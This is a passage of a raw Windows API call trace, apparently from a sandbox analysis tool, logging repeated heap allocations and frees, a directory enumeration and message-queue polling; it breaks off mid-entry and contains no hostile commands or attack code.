1 [0192.828] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c2d9d0 | out: hHeap=0x6a0000) returned 1 [0192.828] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3f885c20, ftCreationTime.dwHighDateTime=0x1d89bfa, ftLastAccessTime.dwLowDateTime=0x702a5b80, ftLastAccessTime.dwHighDateTime=0x1d8a451, ftLastWriteTime.dwLowDateTime=0x702a5b80, ftLastWriteTime.dwHighDateTime=0x1d8a451, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PsRcKmPEdiF_ OxVk", cAlternateFileName="PSRCKM~1")) returned 1 [0192.828] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x751d68 [0192.828] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x6f4d00 [0192.828] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfc) returned 0x2c70bc8 [0192.828] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea920 [0192.828] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2c380a8 [0192.828] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0192.828] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea9a8 [0192.828] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0192.829] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eaab8 [0192.829] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea810 | out: hHeap=0x6a0000) returned 1 [0192.829] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x794008 | out: hHeap=0x6a0000) returned 1 [0192.829] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ed98 | out: hHeap=0x6a0000) returned 1 [0192.829] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0192.830] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0192.830] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eaa30 | out: hHeap=0x6a0000) returned 1 [0192.830] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c2d920 | out: hHeap=0x6a0000) returned 1 [0192.830] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x794008 [0192.830] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6f4d00 | out: hHeap=0x6a0000) returned 1 [0192.831] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x751d68 | out: hHeap=0x6a0000) returned 1 [0192.831] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3f885c20, ftCreationTime.dwHighDateTime=0x1d89bfa, ftLastAccessTime.dwLowDateTime=0x702a5b80, ftLastAccessTime.dwHighDateTime=0x1d8a451, ftLastWriteTime.dwLowDateTime=0x702a5b80, ftLastWriteTime.dwHighDateTime=0x1d8a451, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PsRcKmPEdiF_ OxVk", cAlternateFileName="PSRCKM~1")) returned 0 [0192.831] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0192.831] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0192.832] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b730 | out: hHeap=0x6a0000) returned 1 [0192.832] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0192.832] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a08 [0192.832] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0192.832] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c18 [0192.832] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.832] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.833] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c18 | out: hHeap=0x6a0000) returned 1 [0192.833] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c18 [0192.833] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.833] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.833] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c18 | out: hHeap=0x6a0000) returned 1 [0192.833] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c18 [0192.833] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.834] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.834] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c18 | out: hHeap=0x6a0000) returned 1 [0192.834] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c18 [0192.834] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.834] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.835] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c18 | out: hHeap=0x6a0000) returned 1 [0192.835] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c18 [0192.835] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.835] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.835] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c18 | out: hHeap=0x6a0000) returned 1 [0192.836] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c18 [0192.836] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0192.836] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.836] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c18 | out: hHeap=0x6a0000) returned 1 [0192.836] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c18 [0192.836] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.836] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d3a670 [0192.837] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.837] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0192.837] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c18 | out: hHeap=0x6a0000) returned 1 [0192.837] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c18 [0192.837] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.838] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.838] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c18 | out: hHeap=0x6a0000) returned 1 [0192.838] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c18 [0192.838] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0192.838] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.839] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c18 | out: hHeap=0x6a0000) returned 1 [0192.839] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c18 [0192.839] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0192.839] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0192.840] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c18 | out: hHeap=0x6a0000) returned 1 [0192.840] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c18 [0192.840] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0192.840] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0192.840] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c18 | out: hHeap=0x6a0000) returned 1 [0192.840] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c18 [0192.840] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.841] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.841] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c18 | out: hHeap=0x6a0000) returned 1 [0192.841] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c18 [0192.841] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.841] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.842] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c18 | out: hHeap=0x6a0000) returned 1 [0192.842] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c18 [0192.842] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0192.842] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.842] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c18 | out: hHeap=0x6a0000) returned 1 [0192.842] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c18 [0192.843] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0192.843] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.843] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c18 | out: hHeap=0x6a0000) returned 1 [0192.843] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c18 [0192.843] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.844] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.844] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c18 | out: hHeap=0x6a0000) returned 1 [0192.844] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c18 [0192.844] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.844] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.845] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c18 | out: hHeap=0x6a0000) returned 1 [0192.845] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c18 [0192.845] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.845] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.846] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c18 | out: hHeap=0x6a0000) returned 1 [0192.846] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c18 [0192.846] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.846] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.846] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c18 | out: hHeap=0x6a0000) returned 1 [0192.846] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c18 [0192.847] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.847] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.847] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c18 | out: hHeap=0x6a0000) returned 1 [0192.847] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c18 [0192.847] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.848] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.848] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c18 | out: hHeap=0x6a0000) returned 1 [0192.848] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c18 [0192.848] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.848] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.849] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c18 | out: hHeap=0x6a0000) returned 1 [0192.849] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c18 [0192.849] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.849] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0192.849] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.850] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0192.850] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c18 | out: hHeap=0x6a0000) returned 1 [0192.850] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c18 [0192.850] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.850] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.851] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c18 | out: hHeap=0x6a0000) returned 1 [0192.851] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c18 [0192.851] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.851] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d3a670 [0192.851] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.852] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0192.852] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c18 | out: hHeap=0x6a0000) returned 1 [0192.853] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c18 [0192.853] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0192.853] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0192.854] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c18 | out: hHeap=0x6a0000) returned 1 [0192.854] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c18 [0192.854] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0192.854] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0192.855] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c18 | out: hHeap=0x6a0000) returned 1 [0192.855] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c18 [0192.855] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.855] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.855] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c18 | out: hHeap=0x6a0000) returned 1 [0192.855] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c18 [0192.856] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.856] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.856] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c18 | out: hHeap=0x6a0000) returned 1 [0192.856] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c18 [0192.856] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.856] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0192.857] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.857] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0192.857] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c18 | out: hHeap=0x6a0000) returned 1 [0192.857] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c18 [0192.857] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0192.858] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.858] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c18 | out: hHeap=0x6a0000) returned 1 [0192.858] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c18 [0192.858] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0192.859] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.859] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c18 | out: hHeap=0x6a0000) returned 1 [0192.859] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c18 [0192.859] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.859] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.860] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c18 | out: hHeap=0x6a0000) returned 1 [0192.860] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c18 [0192.860] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.860] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.860] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c18 | out: hHeap=0x6a0000) returned 1 [0192.860] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c18 [0192.860] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.861] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.861] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c18 | out: hHeap=0x6a0000) returned 1 [0192.861] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c18 [0192.861] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.862] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.862] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c18 | out: hHeap=0x6a0000) returned 1 [0192.862] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c18 [0192.862] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.862] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.863] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c18 | out: hHeap=0x6a0000) returned 1 [0192.863] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c18 [0192.863] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.863] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.863] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c18 | out: hHeap=0x6a0000) returned 1 [0192.864] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c18 [0192.864] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.864] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.864] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c18 | out: hHeap=0x6a0000) returned 1 [0192.864] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c18 [0192.864] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.864] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0192.865] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.865] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0192.866] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c18 | out: hHeap=0x6a0000) returned 1 [0192.866] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c18 [0192.866] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.866] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.866] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c18 | out: hHeap=0x6a0000) returned 1 [0192.866] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c18 [0192.866] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0192.867] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0192.867] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c18 | out: hHeap=0x6a0000) returned 1 [0192.867] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c18 [0192.867] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0192.868] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0192.868] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c18 | out: hHeap=0x6a0000) returned 1 [0192.868] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c18 [0192.868] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.868] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.869] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c18 | out: hHeap=0x6a0000) returned 1 [0192.869] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c18 [0192.869] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.869] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.870] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c18 | out: hHeap=0x6a0000) returned 1 [0192.870] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c18 [0192.870] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.870] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0192.870] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.871] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0192.871] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c18 | out: hHeap=0x6a0000) returned 1 [0192.871] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c18 [0192.871] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0192.871] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.872] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c18 | out: hHeap=0x6a0000) returned 1 [0192.872] RtlAllocateHeap 